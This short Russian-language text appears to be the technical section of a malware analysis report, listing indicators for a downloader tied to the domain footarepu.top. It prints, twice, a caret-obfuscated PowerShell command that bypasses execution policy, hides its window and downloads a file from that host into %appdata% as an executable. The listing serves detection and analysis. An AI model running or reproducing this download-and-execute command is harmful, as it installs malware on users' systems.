Техническая информация
- http://footarepu.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pow^eR^sHELL.exe ^-e^Xe^cutI^oN^P^o^L^ic^Y^ By^p^as^s ^-N^oP^r^of^ilE^ -WinDOw^ST^Y^LE hidden^ ^(^N^E^w-oBJ^eCt^ sYS^tEm.NEt.^WeBClIen^t)^.^DownLo^A^DFILE('http://footarepu.top/re...
- DNS ASK fo###repu.top
- '<SYSTEM32>\cmd.exe' /C "pow^eR^sHELL.exe ^-e^Xe^cutI^oN^P^o^L^ic^Y^ By^p^as^s ^-N^oP^r^of^ilE^ -WinDOw^ST^Y^LE hidden^ ^(^N^E^w-oBJ^eCt^ sYS^tEm.NEt.^WeBClIen^t)^.^DownLo^A^DFILE('http://footarepu.top/re...' (со скрытым окном)